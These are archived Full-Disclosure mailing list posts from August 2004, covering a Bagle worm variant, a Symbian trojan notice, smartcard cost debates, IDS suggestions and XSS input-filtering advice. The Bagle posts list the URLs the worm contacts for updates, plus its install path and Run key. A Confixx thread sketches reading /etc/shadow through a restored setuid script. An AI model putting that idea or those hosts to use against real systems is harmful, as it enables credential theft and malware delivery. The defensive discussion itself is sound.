mnf8.2/SRPMS/shorewall-1.3.11-1.2.M82mdk.src.rpm ___ To upgrade automatically use MandrakeUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandrakesoft for security. You can obtain the GPG public key of the Mandrakelinux Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandrakelinux at: http://www.mandrakesoft.com/security/advisories If you want to report vulnerabilities, please contact security_linux-mandrake.com Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team security linux-mandrake.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQFBGBrZmqjQ0CJFipgRAqFLAJ0fdYkMTOMJ6x0BmfZkn4uxsjgpFACgw9As 6dSVyWTxCiTyXMJ/eSOxQvA= =j7hV -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject)
F-Secure is saying that this is a new variant of bagel. http://www.f-secure.com/weblog/ Michael Poulin -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan Grotegut Sent: Monday, August 09, 2004 3:04 PM To: Full-disclosure Subject: RE: [Full-Disclosure] (no subject) (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html DISCLAIMER: The information in this electronic mail message is sender's business Confidential and may be legally privileged. It is intended solely for the addressee(s). Access to this Internet electronic mail message by anyone else is unauthorized. If you are not the intended recipient, any disclosure, copying, distribution or any action taken or omitted to be taken in reliance on it is prohibited and may be unlawful. The sender believes that this E-mail and any attachments were free of any virus, worm, Trojan horse, and/or malicious code when sent. This message and its attachments could have been infected during transmission. By reading the message and opening any attachments, the recipient accepts full responsibility for taking protective and remedial action about viruses and other defects. MASCO is not liable for any loss or damage arising in any way from this message or its attachments. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Clear text password exposure in Datakey's tokens and smartcards
I think we are in agreement - witout necessarily having started out that way! The admin, training and back office costs associated with any authentication mechanism have to be part of the TCO. Secure and partable as smartcard are, their TCO is often prohibitive. Among my customers, OTP devices like SecureID can also be cost prohibitive - but more affordable than Smartcards. Biometrics appear to be somewhere between those two cost levels, and password regimes are the lowest TCO. For these reasons, I suspect, many choose to rely on ID/password regimes, since the admin cost of password regimes is only partially replaced by the equivalent function's overheads in OTP and smartcard regimes - lets not forget permission changes, revocations, and other user maintenance costs. When the cost of password support is added up along side those aspects, then passwords are very cost effective. As we've just discussed the cost of better authentication tools like biometrics and OTP, then a risk/value judgment will occur inevitably depending on each site's perception of risk. I deliberately exclude PKI from the preceding since imho, PKI is merely a tool that verifies after the fact, that the correct password was entered at some time. Lyal -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Tuesday, 10 August 2004 1:01 AM To: Lyal Collins Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Clear text password exposure in Datakey's tokens and smartcards Why yes Lyal, it is... Mea culpa...but: TCO is not as simple as you lay it out for your smartcard either. We were apples-to-apples there for a bit...but, let's drive into your purported TCO costs on the smartcard there, shall we? First, you seem to have no back-end administration (this is a self-maintained model you have? please explain how that works) to deal with lost cards, forgotten PINs, failed/trashed hardware, etc. Additionally, in any reasonably sized enterprise, you'll need resources allocated to handle new hires, machine moves, upgrades, etc. If you intend to cost-burden the existing staff that's fine...but it's still there. System integration? You're telling me your smartcard system has none? Unless you just have your system doing authentications at boot, you most certainly do have intergration. If you intend to secure some environments more than others, like, at the application level, you have the same integration issues with either system (and probably worse with yours, as RSA has been banging around at this a long time, and the list of apps that RSA can bolt onto is extensive)...so let's call that a wash too. So let's jack your per-seat price up accordingly, ok? But you know, tell you what, let's leave your TCO where it is and bear in mind that I was responding to a $1000/seat number from you, not the $210 + consultant you just tossed back. (Sorry if this sounds sarcastic, but you've changed the parameters and ommited factors as important to the TCO as I did, and then lowered your number just to sound more cost-effective...not cricket, old boy) Now, let's take a look at a typical RSA solution, street prices, for 250 users, and remember that the cost scales down from here: server software (w/24x7 support), about $20,000 US server hardware (trivial, but let's toss a couple of blades at it just for fun) $10,000 US Cards (generous here, very) @ $70.00 US X 250 = $17,500 US I'm going to burden my existing staff with back-end support and admin, just like you did. So, we have a per-seat, fully burdened TCO of $190/seat In a mobile workforce there are additional benefits as well, Lyal...like not having laptop users lug around a card reader that they have to a) remember, and b) plug in every time they want to use the PC. You may well respond by saying that's trivial...but then, you aren't the user, he won't say that. The easier we can make his use of secure products and systems the more likely he is to use them, would you agree? Bart Lansing Manager, Desktop Services Kohl's IT Lyal Collins [EMAIL PROTECTED] wrote on 08/08/2004 02:32:15 AM: $10 smartcard $200 reader (with pinpad) $500-$1000 to have someone (at consultant dates) spend up to a day installing the necessary proprietary drivers, install batteries (or AC adapter/plugpacks, because Smartcards can require more power than a serial port, particularly when just inserted and training the (typically non-techo) user on how to use the PINpad. Then 2-3 years later, repeating the whole process again because they upgraded/rebeuilt their machine, and can't get the proporietary drivers to talk to the proprietary reader w/PINpad, or to repalce the batteries etc. One-time token are so much cheaper, and $120-$150 AUD (about US$80) plus $10-$25k for the server software, and a bunch of people time deistributing the right token to the right person, plus system integration
RE: [Full-Disclosure] (no subject)
From incidents.org. I appears to be a new W32/Bagel Variant. Updated August 9th 2004 18:59 UTC (Handler: Jason Lam) * New Bagle (?) Variant Spreading New Bagle Variant Spreading (PRELIMINARY) We received a number of reports about a new virus. Based on a quick string analysis, we assume that this will be classified as a new member of the 'Bagle' family. Like prior versions, it includes a lengthy list of URLs. Infected systems will likely attempt to contact these URLs. All samples received so far arrive without subject. Attachment names are price2.zip, new__price.zip, 08_price.zip, and likely others. The text reads 'price' or 'new price'. According to handler Tom Liston, the virus installs itself as C:\WINDOWS\System32\WINdirect.exe and runs from HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\win_upd2.exe Mitigation Temporarily quarantine or reject all ZIP attachments until AV vendors release signatures. You may also want to monitor or block access to the URLs listed below. Some AV programs do already identify this new version as malware using generic signatures. AV Summary (fromhttp://www.virustotal.com ) BitDefender 7.0/20040809found [JS.Dword.dropper] ClamWin devel-20040727/20040809 found [Trojan.JS.RunMe] eTrustAV-Inoc 4641/20040728 found [JScript/IE.VM.Exploit] F-Prot 3.15/20040809 found nothing Kaspersky 4.0.2.23/20040809 found nothing McAfee 4383/20040804 found [JS/IllWill] NOD32v2 1.835/20040806 found [Win32/IE.Dword unknown infection type (Exploit)] Norman 5.70.10/20040806found [W32/Malware] Panda 7.02.00/20040809found [Fichero Sospechoso] Sybari 7.5.1314/20040809 found [JScript/IE.VM.Exploit] Symantec8.0/20040808found nothing TrendMicro 7.000/20040804 found nothing List of URLs (and respective IPs) Note: From past experience, only a small number of these sites is compromised (if any at all) to update the virus. Most of the sites serve as decoys. However, virus infected systems will access these sites and if you for example use a web proxy, you may be able to find infected systems. We do not know if any of these sites are used to update the code, or if they are just used to collect information about infected systems. http://polobeer.de/2.jpg http://r2626r.de/2.jpg http://kooltokyo.ru/2.jpg http://mmag.ru/2.jpg http://advm1.gm.fh-koeln.de/2.jpg http://evadia.ru/2.jpg http://megion.ru/2.jpg http://molinero-berlin.de/2.jpg http://dozenten.f1.fhtw-berlin.de/2.jpg http://shadkhan.ru/2.jpg http://sacred.ru/2.jpg http://kypexin.ru/2.jpg http://www.gantke-net.com/2.jpg http://www.mcschnaeppchen.com/2.jpg http://www.rollenspielzirkel.de/2.jpg http://134.102.228.45/2.jpg http://196.12.49.27/2.jpg http://aus-Zeit.com/2.jpg http://lottery.h11.ru/2.jpg http://herzog.cs.uni-magdeburg.de/2.jpg http://yaguark.h10.ru/2.jpg http://213.188.129.72/2.jpg http://thorpedo.us/2.jpg http://szm.sk/2.jpg http://lars-s.privat.t-online.de/2.jpg http://www.no-abi2003.de/2.jpg http://www.mdmedia.org/2.jpg http://abi-2004.org/2.jpg http://sovea.de/2.jpg http://www.porta.de/2.jpg http://matzlinger.com/2.jpg http://pocono.ru/2.jpg http://controltechniques.ru/2.jpg http://alexey.pioneers.com.ru/2.jpg http://momentum.ru/2.jpg http://omegat.ru/2.jpg http://www.perfectgirls.net/2.jpg http://porno-mania.net/2.jpg http://colleen.ai.net/2.jpg http://ourcj.com/2.jpg http://free.bestialityhost.com/2.jpg http://slavarik.ru/2.jpg http://burn2k.ipupdater.com/2.jpg http://carabi.ru/2.jpg http://spbbook.ru/2.jpg http://binn.ru/2.jpg http://sbuilder.ru/2.jpg http://protek.ru/2.jpg http://www.PlayGround.ru/2.jpg http://celine.artics.ru/2.jpg http://www.artics.ru/2.jpg http://www.laserbuild.ru/2.jpg http://www.lamatec.com/2.jpg http://www.sensi.com/2.jpg http://www.oldtownradio.com/2.jpg http://www.youbuynow.com/2.jpg http://64.62.172.118/2.jpg http://www.tayles.com/2.jpg http://dodgetheatre.com/2.jpg http://www.thepositivesideofsports.com/2.jpg http://www.bridesinrussia.com/2.jpg http://fairy.dataforce.net/2.jpg http://www.pakwerk.ru/2.jpg http://home.profootball.ru/2.jpg http://www.ankil.ru/2.jpg http://www.ddosers.net/2.jpg http://tarkosale.net/2.jpg http://www.boglen.com/2.jpg http://change.east.ru/2.jpg http://www.teatr-estrada.ru/2.jpg http://www.glass-master.ru/2.jpg http://www.zeiss.ru/2.jpg http://www.sposob.ru/2.jpg http://www.glavriba.ru/2.jpg http://alfinternational.ru/2.jpg http://euroviolence.com/2.jpg http://www.webronet.com/2.jpg http://www.virtmemb.com/2.jpg http://www.infognt.com/2.jpg http://www.vivamedia.ru/2.jpg http://www.zelnet.ru/2.jpg http://www.dsmedia.ru/2.jpg http://www.vendex.ru/2.jpg http://www.elit-line.ru/2.jpg http://pixel.co.il/2.jpg http://www.milm.ru/2.jpg http://dev.tikls.net/2.jpg http://www.met.pl/2.jpg http://www.strefa.pl/2.jpg http://kafka.punkt.pl/2.jpg http://www.rubikon.pl/2.jpg http://www.neostrada.pl/2.jpg http://werel1.web-gratis.net/2.jpg http://www.tuhart.net/2.jpg http
[Full-Disclosure] Symbian Trojan Dialer Advisory
== Airscanner Research Labs Advisory == Airscanner corp. has released a detailed analysis of the first ever known Symbian Trojan For more information please read this article: http://www.informit.com/articles/article.asp?p=327994seqNum=1 This is a cell phone based dialer trojan. = Airscanner Corp http://www.airscanner.com = ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] IDS for Windows
Hi, i'm looking for a Intrusion Detection System (host and/or net) for Windows. It should be Free or Shareware and perhaps it could work in a Windows/Linux network. Any idea ? Bis denn dann, Carsten e-mail: [EMAIL PROTECTED] www: www.sgcr.net mobil: +49-173-2137083 fax: +49-6403-96187 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Security hole in Confixx backup script
On Tue, 10 Aug 2004 02:16:24 +0200, Thomas Loch said: What if someone creates a shell script that simply cat /etc/shadow and sets the SetUID flag. Then he makes a backup of that file and restores the backup while he prevents the chown-command anyhow. All files will remain root. Including the script. The execution of this script will print out the shadowed encrypted passwords. This can even be used to chmod the shadow file and make it readable for everyone You'd probably have to work a *little* harder than a shell script - most Unixoid systems don't allow the execution of a setUID shell script due to various and sundry race conditions involved (which is why 'suidperl' exists). Other than that, you're on the right track.. ;) pgpkZziyEpgCr.pgp Description: PGP signature
Re: [Full-Disclosure] New virus
On Mon, 9 Aug 2004 13:03:54 -0600, Jonathan Grotegut [EMAIL PROTECTED] said: (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? ClamAV picked it up quickly - a freshclam at Aug 9 17:54 UCT included its signature, after the first two to hit me didn't get trapped. http://isc.sans.org/diary.php?date=2004-08-09 cite Handler's Diary August 9th 2004 Updated August 9th 2004 18:59 UTC * New Bagle (?) Variant Spreading New Bagle Variant Spreading (PRELIMINARY) We received a number of reports about a new virus. Based on a quick string analysis, we assume that this will be classified as a new member of the 'Bagle' family. Like prior versions, it includes a lengthy list of URLs. Infected systems will likely attempt to contact these URLs. All samples received so far arrive without subject. Attachment names are price2.zip, new__price.zip, 08_price.zip, and likely others. The text reads 'price' or 'new price'. According to handler Tom Liston, the virus installs itself as C:\WINDOWS\System32\WINdirect.exe and runs from HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\win_upd2.exe /cite -- Alan J. Wylie http://www.wylie.me.uk/ Perfection [in design] is achieved not when there is nothing left to add, but rather when there is nothing left to take away. -- Antoine de Saint-Exupery ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] IDS for Windows
On Tue, 10 Aug 2004 01:41:56 +0200, Carsten Ruckelshausen [EMAIL PROTECTED] wrote: i'm looking for a Intrusion Detection System (host and/or net) for Windows. It should be Free or Shareware and perhaps it could work in a Windows/Linux network. Snort is available for Windows (http://www.snort.org/dl/binaries/win32/) as well as Linux. I haven't played around too much with free HIDS for Windows but if you poke around the SANS reading room (http://www.sans.org/rr/) it looks like a number of papers address this issue. -- Kyle Maxwell [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] [anti-XSS]about CERT/CC:malicious_code_mitigation
Woops, O'Brian is pissed again ;) Real solution is to have per input input validation which will always let some potentially bad things through, but help mitigate exposures and then do things right. Right of course means always binding data to sql statements and properly performing context sensitive output encoding. dd [EMAIL PROTECTED] wrote: On Sat, 07 Aug 2004 06:25:00 -, bitlance winter said: #! The first function takes the negative approach. #! Use a list of bad characters to filter the data sub FilterNeg { local( $fd ) = @_; $fd =~ s/['\%\;\)\(\\+]//g; return( $fd ) ; } *BZZT!!* Wrong. Don't do this in production code, because... I have understood that bad characters are ' % ; ) ( + If it turns out that * (asterisk) is a bad character, you're screwed. If it turns out that *any other* character is bad, you're screwed. The *proper* way to do the filtering is to *remove* *all* characters not known to be good. Something like: $fd =~ s/[^-_ a-zA-Z0-9]//g; Only pass alphabetic, numeric, space, hyphen, and underscore. Add other characters *only* if you can show they are *not* a problem. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] [anti-XSS]about CERT/CC:malicious_code_mitigation
On Mon, 09 Aug 2004 19:45:07 PDT, dd said: Real solution is to have per input input validation which will always let some potentially bad things through, but help mitigate exposures and then do things right. Actually, you should be doing per input validation on each field, which tries to totally eliminate the potentially bad for each field, as appropriate for the field in question - my example of alphanumeric, space, hyphen, and underscore may not be suitable for all fields (as one clued person pointed out to me in private mail). A real program will almost certainly end up with a separate filter for each field type The *important* part is that you're *not* using 's/[list-of-known-bad]//g', but that you use 's/[^list-of-known-good]//g'. Making the known-good list for each field is the programmer's problem. How many CGI scripts have had directory traversal issues that would have been completely and totally prevented if they had done the filtering right and dropped the '/' character (and probably '.' too) out? ;) pgpojH9O3nfy1.pgp Description: PGP signature
Re: [Full-Disclosure] [anti-XSS]about CERT/CC:malicious_code_mitigation
[EMAIL PROTECTED] wrote: On Mon, 09 Aug 2004 19:45:07 PDT, dd said: Real solution is to have per input input validation which will always let some potentially bad things through, but help mitigate exposures and then do things right. Actually, you should be doing per input validation on each field, which tries to totally eliminate the potentially bad for each field, as appropriate for the field in question - my example of alphanumeric, space, hyphen, and nitpick I have always approched input validation more from a buisness side of things then attempting to filter out bad characters. Mitigation of some attacks is a nice side affect of proper input validation. Making developers sweat over what characters to include tends to confuse things, and scare buisness people into limiting things to a point that impacts usability of an application. /nitpick underscore may not be suitable for all fields (as one clued person pointed out to me in private mail). A real program will almost certainly end up with a separate filter for each field type I have yet to meet many real programs I guess :) I would say 90% of the applications I see never come close to performing robust input validation, web or otherwise. Most of the small number of applications I do see performing input validation tend to be ASP.NET applications. A trend I put to the addition of field validators with stock validators for common input types. Hopefully it will continue to get easier for developers to implement reasonable (read: low dev and perf hit) input validation which has always been a sore point in all application development. It might also be worth saying, for those reading along, that input validation should also look for things like format, size, possibly min, max, and other things. The *important* part is that you're *not* using 's/[list-of-known-bad]//g', but that you use 's/[^list-of-known-good]//g'. Making the known-good list for each field is the programmer's problem. Ah, the black list. Oh the black lists I have seen, crushed, and walked passed. The many pages of regex to locate sql injection that have caused major performance impacts. The injection of NULL's, spaces, and odd encodings that cause failures, heart attacks, and buffer overflows. Oh the black list. PS- I assume it wasn't really your intent to remove the good chars... grin Of course that raises the question, what todo with bad input? I would suggest in much humbleness that a generic error page be displayed and proper error logging occur. Never attempt to fix such input. How many CGI scripts have had directory traversal issues that would have been completely and totally prevented if they had done the filtering right and dropped the '/' character (and probably '.' too) out? ;) *yawn* silly cgi programmers... Who was just saying we should require developers get a license to code? Some days, as I'm finding hundreds of buffer overflows, encryption that's a bad night out with xor, and home rolled auth, it seems like a good idea... Imagin sending a bad developer to a safe database course for to many sql injectio infractions :) I'll have to figure out the number of developers who learn from the mistakes found durning an application assessment vs. those who do not. I think its not that bad actually. dd ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] IDS for Windows
I think one can still find portmon, and perhaps a few others, did you try a google search prior to asking here?? That's a prime place to start, then perhaps rephrase here asking for experiences others have had with a few products you find and are interested in/fits your needs/abilities? One thing about a number most? IDS ir portmonitoring software, they tend to show the ports they monitor for activity/action as being open, this will attract a tad more attention to the systems they are placed upon, much as a honeypot will. Better to lock down exposed systems in most cases with a firewall that actually drops or denies all connetion/probe attempts to unwanted exposures. Firewalling remains the most effective primary besides just uninstalling or not installing in the first place, services un-needed and/or not-understood. IDS systems tend to take alot of care and feeding to make real use of them in an unwastfule manner, and they are best placed behind a firewall as one more additional warning layer should the firewall incorrectly fail-open, or die, or not start, or somehow miss something your security policy dictates. Palcing a IDS at the frontgate tends to make them so noisy that they are soon ignored anyways... Thanks, Ron DuFresne On Tue, 10 Aug 2004, Carsten Ruckelshausen wrote: Hi, i'm looking for a Intrusion Detection System (host and/or net) for Windows. It should be Free or Shareware and perhaps it could work in a Windows/Linux network. Any idea ? Bis denn dann, Carsten e-mail: [EMAIL PROTECTED] www: www.sgcr.net mobil: +49-173-2137083 fax: +49-6403-96187 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ~~ Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation. -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html